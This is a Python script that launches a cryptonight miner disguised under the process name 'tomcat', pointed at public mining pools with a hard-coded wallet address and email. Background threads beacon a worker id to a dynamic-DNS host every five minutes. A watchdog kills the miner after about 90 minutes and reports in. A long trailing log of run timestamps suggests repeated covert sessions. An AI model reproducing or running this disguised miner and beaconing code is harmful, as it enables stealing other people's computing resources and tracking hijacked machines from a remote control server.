import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:16:06.219968
#2018-02-17 17:05:05.916533
#2018-02-17 18:53:04.067208
#2018-02-17 20:40:04.517222
#2018-02-17 22:27:04.245585
#2018-02-18 00:10:03.919426
#2018-02-18 02:02:01.447605
#2018-02-18 03:49:04.745016
#2018-02-18 05:37:04.922072
#2018-02-18 07:30:08.857906
#2018-02-18 09:18:04.389746
#2018-02-18 11:03:05.776822
#2018-02-18 12:49:01.820279
#2018-02-18 14:37:04.937711
#2018-02-18 16:26:05.883632
#2018-02-18 18:15:07.331021
#2018-02-18 20:01:02.902680
#2018-02-18 21:48:05.896363
#2018-02-18 23:37:06.131113
#2018-02-19 01:23:05.189193
#2018-02-19 03:12:04.634849
#2018-02-19 04:57:03.756672
#2018-02-19 06:42:06.090108
#2018-02-19 08:31:07.319135
#2018-02-19 10:19:08.367852
#2018-02-19 12:07:08.167884
#2018-02-19 13:53:01.388947
#2018-02-19 15:42:11.853158
#2018-02-19 17:31:04.894570
#2018-02-19 19:19:02.069120
#2018-02-19 21:06:04.292373
#2018-02-19 22:52:07.679237
#2018-02-20 00:36:03.691672
#2018-02-20 02:25:06.961680
#2018-02-20 04:15:09.127847
#2018-02-20 05:59:05.300622
#2018-02-20 07:45:07.102854
#2018-02-20 09:31:08.340742
#2018-02-20 11:14:04.217917
#2018-02-20 13:02:04.221713
#2018-02-20 14:46:04.820113
#2018-02-20 16:34:05.074349
#2018-02-20 18:22:01.954395
#2018-02-20 20:12:08.960005
#2018-02-20 21:59:07.428825
#2018-02-20 23:40:04.623681
#2018-02-21 01:24:03.404310
#2018-02-21 03:13:05.729469
#2018-02-21 05:00:07.675674
#2018-02-21 06:47:06.126902
#2018-02-21 08:34:04.962015
#2018-02-21 10:19:07.199843
#2018-02-21 12:06:07.495133
#2018-02-21 13:56:05.969284
#2018-02-21 15:40:12.099812
#2018-02-21 17:33:10.774609
#2018-02-21 19:19:10.536044
#2018-02-21 21:07:07.414065
#2018-02-21 22:53:05.517175
#2018-02-22 00:39:06.622766
#2018-02-22 02:26:04.477936
#2018-02-22 04:13:04.225548
#2018-02-22 05:58:07.285260
#2018-02-22 07:45:01.739143
#2018-02-22 09:36:07.324770
#2018-02-22 11:21:01.592560
#2018-02-22 13:08:03.638570
#2018-02-22 14:56:05.443581
#2018-02-22 16:41:08.923002
#2018-02-22 18:27:04.943023
#2018-02-22 20:20:01.622514
#2018-02-22 22:05:05.033375
#2018-02-22 23:53:05.939684
#2018-02-23 01:40:09.755008
#2018-02-23 03:28:03.967658
#2018-02-23 05:14:07.620500
#2018-02-23 06:59:04.777595
#2018-02-23 08:49:08.751744
#2018-02-23 11:08:04.400370
#2018-02-23 13:02:02.027784
#2018-02-23 14:46:06.246819
#2018-02-23 16:34:05.703974
#2018-02-23 18:20:09.910542
#2018-02-23 20:06:06.092434
#2018-02-23 21:51:07.202691
#2018-02-23 23:37:01.458364
#2018-02-24 01:25:08.600258
#2018-02-24 03:17:05.271970
#2018-02-24 05:02:07.807395
#2018-02-24 06:50:06.980464
#2018-02-24 08:33:03.879521
#2018-02-24 10:19:05.229491
#2018-02-24 12:15:01.876027
#2018-02-24 14:06:01.735582
#2018-02-24 15:53:05.531292
#2018-02-24 17:47:06.120727
#2018-02-24 19:34:04.351603
#2018-02-24 21:22:04.191452
#2018-02-25 00:02:02.117294
#2018-02-25 04:10:02.833180
#2018-02-25 07:41:05.315477